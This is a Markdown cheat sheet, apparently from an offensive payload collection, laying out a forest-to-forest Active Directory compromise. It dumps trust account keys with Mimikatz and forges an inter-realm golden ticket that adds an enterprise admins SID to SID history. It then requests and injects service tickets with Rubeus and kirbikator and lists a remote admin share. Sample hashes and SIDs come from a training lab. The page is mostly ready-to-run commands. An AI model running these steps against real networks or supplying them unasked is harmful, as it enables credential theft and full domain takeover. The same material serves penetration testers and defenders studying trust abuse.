42 lines
1.8 KiB
Markdown
42 lines
1.8 KiB
Markdown
# Forest to Forest Compromise - Trust Ticket
|
|
|
|
* Require: SID filtering disabled
|
|
|
|
From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using
|
|
Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**.
|
|
|
|
## Dumping trust passwords (trust keys)
|
|
|
|
> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts.
|
|
|
|
```powershell
|
|
lsadump::trust /patch
|
|
|
|
or find the TRUST_NAME$ machine account hash
|
|
```
|
|
|
|
## Create a forged trust ticket (inter-realm TGT) using Mimikatz
|
|
|
|
```powershell
|
|
mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
|
|
mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
|
|
```
|
|
|
|
## Use the Trust Ticket file to get a ST for the targeted service
|
|
|
|
```powershell
|
|
.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
|
|
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
|
|
```
|
|
|
|
Inject the ST file and access the targeted service with the spoofed rights.
|
|
|
|
```powershell
|
|
kirbikator lsa .\ticket.kirbi
|
|
ls \\machine.domain.local\c$
|
|
```
|
|
|
|
|
|
## References
|
|
|
|
* [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab) |